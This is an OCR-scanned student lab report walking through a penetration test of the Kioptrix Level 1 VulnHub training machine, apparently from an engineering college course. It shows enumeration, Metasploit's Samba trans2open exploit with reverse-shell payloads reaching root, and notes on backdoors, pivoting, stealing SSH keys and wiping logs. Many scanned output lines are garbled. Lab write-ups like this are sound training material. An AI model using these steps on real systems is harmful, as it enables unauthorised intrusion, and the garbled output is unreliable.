• Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site

Scripting (XSS)

• backdoor file manager may also be of interest!

Web Directory Enumeration

36
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
There are quite a few popular tools we can leverage to enumerate web directories/URLs. I
will be using dirbuster. Here we just input the IP address as http:l/192.168.153.128:80/ and give
dirbuster a word list. If you are using Kalie you can find the wordlists in /usr/share/wordlists/,
specifically for dirbuster we can find them in /usr/share/wordlists/dirbuster/ and for this one I will
be using the small word list:

¥ OWAS?DirB11.1:1,terl.0-R:Cl •WebAp1Ptict1ti,:rn8r,ukforcing _ l!J X

cgiabin 403 231

icons 200 204
doc 403 231
test..php 2010 323
manual 200 04
us ge 200 5811
a m m1i 200 18036

Current speed: O req1JJ est sfse c:

A'!.lernge spe,ed: (l) l O 2, {CJ O re quest:s/se!c
Parse Qu e1Ue Size: O
1

TotaI Reque.st:s: 5i49mm.57177 4

From here we could go over the pages and see if we find anything interesting. From a quick
look, nothing juicy caught my eye so I will continue along and see what else we can find...

SMB Enumeration

With our initial Nmap scan we found SMB open on port 139. Let's dig further into this as we
can often exploit SMB and abuse the access to shares.
We'll start by leveraging some of the scripts included in Nmap to get more information:

Nmap scan report for 192.168.153.128

Host is up (0.001 ls latency).

PORT STATE SERVICE

139/tcp open netbios-ssn

Host script results:

I nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
I Names:

37
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Let's try using Metasploit as well to enumerate further. Run msfconsole, then use
auxiliary/scanner/smb/smb_version. Here we can type options to see what else is required to use this
module. We need to specify the RHOSTS, which will be the IP and number of threads to use:

msf6 > use auxiliary/scanner/smb/smb_version

msf6 auxiliary(scanner/smb/smb_version)> options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description

RHOSTS yes

THREADS 1 yes

msf6 auxiliary(scanner/smb/smb_version) > run

Awesome, now we have a version number for Samba which we might be able to use in the
future. Let's do some further enumeration:

set
Anonymous login successful

Sharename Type Comment

IPC$ IPC

set
Anonymous login successful

Server Comment

KIOPTRIX Samba Server

Workgroup Master

38
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
MYGROUP KIOPTRIX
NOTE: With the latest version of Kali I run into an issue when using smbclient and I had to
fix it by editing the samba configuration file and adding the following options
under [global] using sudo vim /etc/samba/smb.conf:

Now that we have some share names we can attempt to connect to the shares and see if we
can use them to our advantage:

= yes' and 'client ntlmv2 auth = yes' is

set

130 X

Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is

Anonymous login successful

So not too much here, limited accessibility but we surfaced new information for our notes.

39
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Vulnerability Scanning

Additional to all the work we have done so far, we can do a vulnerability scan of the target(s)
with Nessus to see if we can find some vulnerabilities we can leverage. The nice thing about
Nessus is that it performs a lot of the work automatically for you which scales very nicely:

40
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Recap so far...

Now we have enumerated quite a few things on this machine and thanks to our good note
keeping we can investigate further and see if we can leverage anything that we have found so
far to accomplish our goals.

Pre-Exploitation - Google FU

We can try to search for vulnerabilities with the application service version numbers:

41
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

42
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

In this section we can see that there are several different ways we can find things out about
our target, and the more we know the more successful we will be.

43
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
Pre-Exploitation - Searchsploit
We can use the searchsploit tool in Kali to search for possible exploits available for the
applications/services that we have enumerated so far as well:

44
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Exploitation
We are going to be using everything we've gathered so far to find a way into this machine
and get a root shell! This is definitely another exciting part of the whole process where
everything comes together!

Exploiting Samba 2.2.la

We know by using both searchsploit and our friend Google that there is a vulnerability in this
version of Samba and that there is an exploit for it. Here is a link to the Rapid7
reference . From this page we can gather that exploit is included
in a module within Metasploit, so let's fire it up and give it a shot msfconsole and do a quick
search:

We are going to be using option 22, the exploit/linux/samba/trans2open:

45
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

In my case, after we ty the exploit, we can see that we are close to getting a Meterpreter shell,
but it keeps on dying .... That's no fun. If we take a look at the source code, it looks like it is
walking the stack and trying the different return addresses to attempt the buffer overflow
exploit in the reply_trans2() function. In theory this should work...

msf6 exploit( ) exploit

192.168.153.128 - Meterpreter session l closed. Reason: Died

Meterpreter session 1 is not valid and will be closed

Sending stage (984904 bytes) to 172.28.48.1

192.168.153.128 - Meterpreter session 2 closed. Reason: Died

Sending (984904 to 172.28.48.1

192.168.153.128 - Meterpreter session closed. Reason; Died

This is telling us that the exploit looks to be "kind of' working but there may be something
wrong with the payload, which is the code that we want to run after the exploit. In a nutshell,
the way this works is that we have an exploit which takes advantage of the vulnerability and
gets us to the point where can run our own code, the payload would be "our own code" that

46
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
we want to run after the exploit, which in this case is the meterpreter shell. Let's take a look at
our options one more time:

Right now, we are using a staged payload. Let's try a non-staged payload and see if that
works for us?

msf6 exploit ( ) > search linux/x86/meterpreter

M,'\tching Morlule .

l=l;ink Check Df'c;c-ri pti on

e payload/linux/x86/meterpreter_reversc_httµ norrn.:i.l Jo Linux Meterpreter, Rcvci·se l!TTP

Intine
l payload/linux/x86/meterpreler_reverse_htlp normal No Linux Mete.rpreler, Reverse HTTP
s Inlirte
2 paylaad/linux/x86/meterpreter_reverse_tcp normal Jo Linux Meterpreter, J;!,e1Jer-se TCP
Inline
3 payloai1/linux/xS6/ffleterpreter/bind_ipv6_tcp norm. .l No Linux Mettl.e ">:"86, Bind l l>•J6 TCP
Stager (Linux x86)
l..l p.:iylo.:it1/liilUX/X86/•i::ti::rpreter/bir1d_ipv6_ tcp_uuitl no:r-111.:il No Mettle Bfod IPvG TCP
S't".::1gn· ,.-ith l.ll.lJD StJppor-i:- -.:86)
5 pay load/linux/dl6/meterpreter /bind_nonx_lcp normal No TCP Stag

6 paylaad/linux/xB6/meterpreter /bind tcp normal No Stag

(Linux x86)
paylo<'ld/linu::.:h:S6 I• eter-preter /bind_tc p _ uuid No Mettle TCP St<'lg
with LlLID Support (Linux
8 pa.y lua.t1/linux/xa6/11ete1•prete r/f ind_tdg na.rrna.l M!i!llle S'Lc1g

9 pay load/ linux/:d36/meterpreter /reverse_nonx_tcp normal Jo Mettle Reverse TCP s

p;i)rlo;id/ lini..rxh:86/111eterprete r/rever<sf" 't!"p normal. Jo I jnux Mt:"ttl,;,, x8€:i Pf'Vf'J'c;i? TrP s
1:.-ay load/li nu::,:Jxa6/• eterpreter /revers.e_tc p_uuid norrn.:i.l No Mettle Reverse TCP 5

linux/x86/meterpreler/reverse_ipv6_lcp normal No Mellle Reverse TCP s

47
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Hmm no luck, let's try a different payload altogether since meterpreter just doesn't seem to be
working for us:
msf6 exploit( ) > set

sf6

St.=i.rted reverse TCP handler on 1?2.28.58.217:444l.!

192.168.153.128:139 - Trying return address 0xbffffdfc ...
192.168.153.128:139 - Trying return ddress oxbffffcfc ...
192.168.153.128:139 - Trying return address 0xbffffbfc ...
192.168.153.12.S:139 - Trying return address 0xb-ffffa.fc ...
192. 168.153 .12.S: 139 Trying return address O:d:>ffff9fc .. .
19]. 168. l 53. Df.l: 139 Trying retu.:rn r.1ddre-ss 0xbffff8fr ...
192.168.153.12.8:139 - Trying retusn a.ddress 0xbffff7fc ...
Command shell session 9 opened (172.28.50.217:44l.! 4 172 28 48.1:58787) at 2021 11 30 07:15:56 -0890

Comm.and 172.28. a.1: 5-078B) a.t 2921-11-30 <:17:15:57 -0800

Command shell session 11 172.2.s.qa_l:50789) at 2921-11-30 e7:15:5.S -0B00
Command shell session 12 172.2.S. 8.1:50790) at 2021-11-30 e7:15:59 -0800
echo "Got Shell'"?
Got Shell?

We got our self a root shell. Thus, we have successfully rooted the machine which was our
main goal

48
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Post Exploitation + Maintaining Access

From here we could establish persistence by creating another user and/or setting up a
backdoor to allow us for easier access next time in case the machine get patched. Real
attackers may patch the machine and have their own backdoor setup to limit access to others
who could exploit these vulnerabilities.
We can now also use this machine as our staging/jump host machine to install tooling and for
further recon and pivoting into the rest of the network. Meaning that we can see what other
machines are available to us from here which we may be able to access and possibly exploit
to expand our capabilities and what information we have access to.
We should also look in this machine for other things that we can use such as SSH keys,
interesting files, access to important data?

Covering Tracks & Clean Up

If we installed any backdoors or other binaries, we should clean those up. Our goal should be
to leave the systems we touched in an equal or better state than we found them in. You don't
want to leave a backdoor open on a critical system that may get overlooked and then an
attacker can leverage that to get a foothold on the network. We could also wipe the logs and
history.

49
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

The Report
Kioptrix Level 1 Vulnerability Assessment Report

Assessment Date: Oct 2, 2023

Assessment Performed By: vlpachi7 {your name}

Executive Summary
In the pursuit of enhancing our cybersecurity skills, we conducted a comprehensive
vulnerability assessment on the Kioptrix Level 1 virtual machine from VulnHub. The primary
objective of this assessment was to gain root-level access to the target system while following
ethical hacking practices.
Our approach was rigorous, mirroring the methods employed in real-world engagement. The
assessment covered a range of phases, from initial planning to post-exploitation, and
concluded with a systematic report of our findings.

Scope & Initial Planning

Understanding the scope of the assessment was the first crucial step. Our scope encompassed
all components of the Kioptrix system, including open ports and services. The objective was
to identify vulnerabilities that could potentially compromise the target.

Recon - Information Gathering

In this phase, we initiated the assessment by determining our IP address and then conducting
network discovery. Once our target was identified, we moved on to scanning and
enumeration.

Scanning & Enumeration

Using Nmap, we scanned the target system to identify open ports and services. By analyzing
the scan results, we identified critical services, including SSH, HTTP, and netbios-ssn, which
laid the foundation for further analysis.

Web Server/Page/App Enumeration

We explored the web server on port 80, revealing that it was running Apache 1.3.20. Further
details about the web server were obtained using Nikto, which identified potential
vulnerabilities and areas of interest.

Web Directory Enumeration

To uncover hidden web directories and URLs, we employed dirbuster with a word list.
Although no critical findings were made, this process was vital in ensuring a comprehensive
examination.

50
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

SMB Enumeration

With port 139 indicating the presence of SMB, we employed various scripts and tools to
extract information about the shares. While the access was limited, this phase contributed
valuable information.

Vulnerability Scanning
We extended the assessment by conducting a vulnerability scan using Nessus. This automated
process aimed to identify additional vulnerabilities that could be leveraged for our goals.

Pre-Exploitation
Prior to launching an attack, we conducted thorough research, focusing on vulnerabilities
associated with application and service versions. Both Google searches and searchsploit
utility were used to identify potential exploits.

Exploitation
After identifying a known vulnerability in Samba 2.2. la and locating an appropriate exploit
module in Metasploit, we attempted to exploit the target. We encountered some initial
challenges with payload execution but eventually achieved a root shell.

Post Exploitation + Maintaining Access

Upon successfully rooting the system, we considered post-exploitation activities. This phase
involved establishing persistence, creating additional user accounts, and securing access for
future engagements. The compromised system also served as a staging point for network
reconnaissance.

Covering Tracks & Clean Up

In adherence to ethical practices, we ensured that any changes made to the system were
reversed, including the removal of backdoors, binaries, and logs. Leaving the system in a
secure state was a paramount concern.

CONCLUSION: We successfully Implemented Kioptrix Level 1: Vulnerability

Assessmentand Penetration Testing

51